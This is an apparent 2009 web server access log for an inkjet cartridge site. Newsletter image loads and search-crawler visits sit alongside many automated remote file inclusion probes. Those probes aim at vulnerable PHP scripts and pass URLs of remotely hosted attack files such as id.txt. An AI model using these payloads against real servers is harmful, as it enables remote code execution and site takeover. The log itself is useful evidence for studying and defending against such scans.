222.122.27.67 - - [02/Jul/2009:09:56:52 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
222.122.27.67 - - [02/Jul/2009:09:56:52 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
208.38.187.136 - - [02/Jul/2009:09:57:24 -0700] "GET /logs/access.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
208.38.187.136 - - [02/Jul/2009:09:57:27 -0700] "GET /logs/access.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
212.175.12.133 - - [02/Jul/2009:09:57:47 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
212.175.12.133 - - [02/Jul/2009:09:58:34 -0700] "GET /logs/scripts.log//include/bbs.lib.inc.php?site_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
202.181.243.113 - - [02/Jul/2009:09:59:17 -0700] "GET /logs/access.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
72.66.56.223 - - [02/Jul/2009:10:00:32 -0700] "GET /email/images/inkmail12_03.gif HTTP/1.1" 200 16939 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "site.inkjetcartridge.com"
72.66.56.223 - - [02/Jul/2009:10:00:33 -0700] "GET /email/images/inkmail12_04.gif HTTP/1.1" 200 14433 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "site.inkjetcartridge.com"
72.66.56.223 - - [02/Jul/2009:10:00:34 -0700] "GET /email/images/inkmail12_05.gif HTTP/1.1" 200 15420 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "site.inkjetcartridge.com"
72.66.56.223 - - [02/Jul/2009:10:00:34 -0700] "GET /email/images/inkmail12_06.gif HTTP/1.1" 200 26721 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "site.inkjetcartridge.com"
222.122.27.67 - - [02/Jul/2009:10:04:52 -0700] "GET /logs/scripts.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
222.122.27.67 - - [02/Jul/2009:10:05:01 -0700] "GET /logs/scripts.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
74.6.8.101 - - [02/Jul/2009:10:05:39 -0700] "GET /phpbb/viewtopic.php?p=504 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
69.72.208.90 - - [02/Jul/2009:10:08:59 -0700] "GET /logs/admin/classes/TplLoad.php?full_path_to_public_program=http://getcpn.com/104/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
69.72.208.90 - - [02/Jul/2009:10:08:59 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://getcpn.com/104/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
69.72.208.90 - - [02/Jul/2009:10:08:59 -0700] "GET /logs/access.log/admin/classes/TplLoad.php?full_path_to_public_program=http://getcpn.com/104/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
72.3.224.55 - - [02/Jul/2009:10:20:44 -0700] "GET /phpbb/viewtopic.php?t=1641 HTTP/1.1" 200 533 "http://www.localpokercasino.com/infointernet-cards-game6.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Crazy Browser 1.x.x)" "site.inkjetcartridge.com"
91.121.89.135 - - [02/Jul/2009:10:28:02 -0700] "GET /logs/access.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
91.121.89.135 - - [02/Jul/2009:10:28:02 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
91.121.89.135 - - [02/Jul/2009:10:28:02 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
91.121.89.135 - - [02/Jul/2009:10:29:40 -0700] "GET /logs/access.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
198.64.149.93 - - [02/Jul/2009:10:34:53 -0700] "GET /include/mail.inc.php?skin_board_path=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "site.inkjetcartridge.com"
198.64.149.93 - - [02/Jul/2009:10:34:53 -0700] "GET /include/mail.inc.php?skin_board_path=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "site.inkjetcartridge.com"
91.121.89.135 - - [02/Jul/2009:10:35:09 -0700] "GET /logs/access_090330.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
190.4.11.98 - - [02/Jul/2009:10:35:57 -0700] "GET /images/DELL-922-RECBUNDLE.jpg HTTP/1.1" 200 20327 "http://espanol.images.search.yahoo.com/images/view?back=http%3A%2F%2Fespanol.images.search.yahoo.com%2Fsearch%2Fimages%3Fp%3Ddell%2B922%26ei%3DUTF-8%26fr%3Dyfp%26fr2%3Dtab-web&w=500&h=250&imgurl=site.inkjetcartridge.com%2Fimages%2FDELL-922-RECBUNDLE.jpg&rurl=http%3A%2F%2Fsite.inkjetcartridge.com%2Fimages%3FN%3DA&size=19k&name=DELL+922+RECBUND...&p=dell+922&oid=daf4d32b1292d164&fr2=tab-web&no=8&tt=520&sigr=11arru4hg&sigi=11mq4ih6n&sigb=12rreha4c&type=JPG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; yie8)" "site.inkjetcartridge.com"
190.4.11.98 - - [02/Jul/2009:10:35:57 -0700] "GET /images?N=A HTTP/1.1" 301 106 "http://espanol.images.search.yahoo.com/images/view?back=http%3A%2F%2Fespanol.images.search.yahoo.com%2Fsearch%2Fimages%3Fp%3Ddell%2B922%26ei%3DUTF-8%26fr%3Dyfp%26fr2%3Dtab-web&w=500&h=250&imgurl=site.inkjetcartridge.com%2Fimages%2FDELL-922-RECBUNDLE.jpg&rurl=http%3A%2F%2Fsite.inkjetcartridge.com%2Fimages%3FN%3DA&size=19k&name=DELL+922+RECBUND...&p=dell+922&oid=daf4d32b1292d164&fr2=tab-web&no=8&tt=520&sigr=11arru4hg&sigi=11mq4ih6n&sigb=12rreha4c&type=JPG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; yie8)" "site.inkjetcartridge.com"
190.4.11.98 - - [02/Jul/2009:10:35:58 -0700] "GET /images/?N=A HTTP/1.1" 200 90939 "http://espanol.images.search.yahoo.com/images/view?back=http%3A%2F%2Fespanol.images.search.yahoo.com%2Fsearch%2Fimages%3Fp%3Ddell%2B922%26ei%3DUTF-8%26fr%3Dyfp%26fr2%3Dtab-web&w=500&h=250&imgurl=site.inkjetcartridge.com%2Fimages%2FDELL-922-RECBUNDLE.jpg&rurl=http%3A%2F%2Fsite.inkjetcartridge.com%2Fimages%3FN%3DA&size=19k&name=DELL+922+RECBUND...&p=dell+922&oid=daf4d32b1292d164&fr2=tab-web&no=8&tt=520&sigr=11arru4hg&sigi=11mq4ih6n&sigb=12rreha4c&type=JPG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; yie8)" "site.inkjetcartridge.com"
198.64.149.93 - - [02/Jul/2009:10:36:00 -0700] "GET /logs/access.log/include/mail.inc.php?skin_board_path=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "site.inkjetcartridge.com"
198.64.149.93 - - [02/Jul/2009:10:36:00 -0700] "GET /include/mail.inc.php?skin_board_path=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "site.inkjetcartridge.com"
198.64.149.93 - - [02/Jul/2009:10:36:00 -0700] "GET /logs/include/mail.inc.php?skin_board_path=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "site.inkjetcartridge.com"
198.64.149.93 - - [02/Jul/2009:10:36:00 -0700] "GET /logs/access.log/include/mail.inc.php?skin_board_path=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "site.inkjetcartridge.com"
198.64.149.93 - - [02/Jul/2009:10:36:03 -0700] "GET /include/mail.inc.php?skin_board_path=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "site.inkjetcartridge.com"
198.64.149.93 - - [02/Jul/2009:10:36:03 -0700] "GET /logs/include/mail.inc.php?skin_board_path=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "site.inkjetcartridge.com"
74.6.8.101 - - [02/Jul/2009:10:36:11 -0700] "GET /phpbb/posting.php?mode=quote&p=1009 HTTP/1.0" 200 518 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
91.121.89.135 - - [02/Jul/2009:10:39:42 -0700] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
91.121.89.135 - - [02/Jul/2009:10:39:42 -0700] "GET /logs/access.log%20%20/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
91.121.89.135 - - [02/Jul/2009:10:39:42 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
74.6.8.101 - - [02/Jul/2009:10:41:48 -0700] "GET /phpbb/viewtopic.php?t=1540 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
74.6.8.101 - - [02/Jul/2009:10:42:06 -0700] "GET /phpbb/viewtopic.php?t=1042&highlight= HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
91.121.89.135 - - [02/Jul/2009:10:46:19 -0700] "GET /logs/access.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
198.64.149.93 - - [02/Jul/2009:10:52:00 -0700] "GET /logs/scripts.log/include/mail.inc.php?skin_board_path=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "site.inkjetcartridge.com"
198.64.149.93 - - [02/Jul/2009:10:52:00 -0700] "GET /logs/scripts.log/include/mail.inc.php?skin_board_path=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "site.inkjetcartridge.com"
74.6.8.101 - - [02/Jul/2009:11:02:56 -0700] "GET /phpbb/viewtopic.php?t=1647 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
75.64.126.176 - - [02/Jul/2009:11:14:55 -0700] "GET /email/images/inkmail13_02.gif HTTP/1.1" 200 16093 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1)" "site.inkjetcartridge.com"
69.59.21.101 - - [02/Jul/2009:11:16:34 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
85.17.162.28 - - [02/Jul/2009:11:17:17 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
85.17.162.28 - - [02/Jul/2009:11:17:17 -0700] "GET /logs/access.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
85.17.162.28 - - [02/Jul/2009:11:17:17 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
96.253.208.18 - - [02/Jul/2009:11:20:12 -0700] "GET /email/images/inkmail12_02.gif HTTP/1.1" 200 17029 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts)" "site.inkjetcartridge.com"
96.253.208.18 - - [02/Jul/2009:11:20:12 -0700] "GET /email/images/inkmail12_01.gif HTTP/1.1" 200 5891 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts)" "site.inkjetcartridge.com"
83.98.209.71 - - [02/Jul/2009:11:20:35 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [02/Jul/2009:11:20:45 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [02/Jul/2009:11:20:52 -0700] "GET /logs/access.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
74.6.8.101 - - [02/Jul/2009:11:21:42 -0700] "GET /phpbb/viewtopic.php?t=4622&highlight= HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
74.6.8.101 - - [02/Jul/2009:11:24:14 -0700] "GET /phpbb/viewtopic.php?t=892 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
201.232.54.48 - - [02/Jul/2009:11:27:21 -0700] "GET /logs/access.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
74.6.8.101 - - [02/Jul/2009:11:29:01 -0700] "GET /email/?S=D HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
68.44.241.169 - - [02/Jul/2009:11:33:35 -0700] "GET /email/images/inkmail12_01.gif HTTP/1.1" 200 5891 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB5; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "site.inkjetcartridge.com"
68.44.241.169 - - [02/Jul/2009:11:33:35 -0700] "GET /email/images/inkmail12_03.gif HTTP/1.1" 200 16939 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB5; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "site.inkjetcartridge.com"
68.44.241.169 - - [02/Jul/2009:11:33:36 -0700] "GET /email/images/inkmail12_05.gif HTTP/1.1" 200 15420 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB5; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "site.inkjetcartridge.com"
68.44.241.169 - - [02/Jul/2009:11:33:36 -0700] "GET /email/images/inkmail12_06.gif HTTP/1.1" 200 26721 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB5; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "site.inkjetcartridge.com"
61.78.62.84 - - [02/Jul/2009:11:35:18 -0700] "GET /logs/include/lib.inc.php?site_path=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/idi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
61.78.62.84 - - [02/Jul/2009:11:35:18 -0700] "GET /logs/access.log/include/lib.inc.php?site_path=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/idi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
61.78.62.84 - - [02/Jul/2009:11:35:18 -0700] "GET /include/lib.inc.php?site_path=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/idi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
61.78.62.84 - - [02/Jul/2009:11:38:04 -0700] "GET /include/lib.inc.php?site_path=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/idi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
61.78.62.84 - - [02/Jul/2009:11:38:29 -0700] "GET /logs/scripts.log/include/lib.inc.php?site_path=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/idi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
61.78.62.84 - - [02/Jul/2009:11:39:01 -0700] "GET /logs/scripts.log/include/lib.inc.php?site_path=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/idi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
61.78.62.84 - - [02/Jul/2009:11:39:01 -0700] "GET /include/lib.inc.php?site_path=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/idi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
61.78.62.84 - - [02/Jul/2009:11:39:01 -0700] "GET /logs/include/lib.inc.php?site_path=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/idi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
61.78.62.84 - - [02/Jul/2009:11:39:03 -0700] "GET /logs/scripts.log/include/lib.inc.php?site_path=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/idi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
74.6.8.101 - - [02/Jul/2009:11:44:48 -0700] "GET /phpbb/viewtopic.php?p=2296 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
74.6.8.101 - - [02/Jul/2009:11:47:34 -0700] "GET /phpbb/viewtopic.php?p=156 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
74.6.8.101 - - [02/Jul/2009:11:54:27 -0700] "GET /phpbb/viewtopic.php?p=443 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
74.6.8.101 - - [02/Jul/2009:11:54:59 -0700] "GET /phpbb/viewtopic.php?p=1007 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
74.6.8.101 - - [02/Jul/2009:11:57:25 -0700] "GET /phpbb/viewtopic.php?t=1037&highlight= HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
203.151.217.29 - - [02/Jul/2009:12:04:01 -0700] "GET /logs/access.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
203.151.217.29 - - [02/Jul/2009:12:04:01 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 200 2132 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
203.151.217.29 - - [02/Jul/2009:12:04:01 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 200 1229 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
203.151.217.29 - - [02/Jul/2009:12:12:20 -0700] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:12:30:40 -0700] "GET /logs//admin.cropcanvas.php?cropimagedir=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:12:30:40 -0700] "GET /logs/access.log%20%20//admin.cropcanvas.php?cropimagedir=http://blendcolours.com/scc/1.swf?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:12:30:40 -0700] "GET /admin.cropcanvas.php?cropimagedir=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:12:30:56 -0700] "GET /admin.cropcanvas.php?cropimagedir=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:12:30:56 -0700] "GET /logs//admin.cropcanvas.php?cropimagedir=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:12:30:56 -0700] "GET /logs/access.log%20%20//admin.cropcanvas.php?cropimagedir=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:12:30:58 -0700] "GET /admin.cropcanvas.php?cropimagedir=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:12:30:58 -0700] "GET /logs//admin.cropcanvas.php?cropimagedir=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:12:31:00 -0700] "GET /admin.cropcanvas.php?cropimagedir=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:12:31:00 -0700] "GET /logs//admin.cropcanvas.php?cropimagedir=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:12:31:06 -0700] "GET /admin.cropcanvas.php?cropimagedir=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:12:31:06 -0700] "GET /logs/access.log%20%20//admin.cropcanvas.php?cropimagedir=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:12:31:06 -0700] "GET /logs//admin.cropcanvas.php?cropimagedir=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:12:31:08 -0700] "GET /logs/access.log%20%20//admin.cropcanvas.php?cropimagedir=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
170.215.59.110 - - [02/Jul/2009:12:46:47 -0700] "GET /email/images/mailer10_03.gif HTTP/1.1" 200 12529 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; yie8)" "site.inkjetcartridge.com"
170.215.59.110 - - [02/Jul/2009:12:55:40 -0700] "GET /email/images/inkmail9_01.gif HTTP/1.1" 200 7407 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; yie8)" "site.inkjetcartridge.com"
170.215.59.110 - - [02/Jul/2009:12:55:40 -0700] "GET /email/images/inkmail9_02.gif HTTP/1.1" 200 16920 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; yie8)" "site.inkjetcartridge.com"
170.215.59.110 - - [02/Jul/2009:12:55:41 -0700] "GET /email/images/inkmail9_03.gif HTTP/1.1" 200 18329 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; yie8)" "site.inkjetcartridge.com"
170.215.59.110 - - [02/Jul/2009:12:55:41 -0700] "GET /email/images/inkmail9_04.gif HTTP/1.1" 200 17259 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; yie8)" "site.inkjetcartridge.com"
170.215.59.110 - - [02/Jul/2009:12:55:42 -0700] "GET /email/images/inkmail9_05.gif HTTP/1.0" 200 18228 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; yie8)" "site.inkjetcartridge.com"
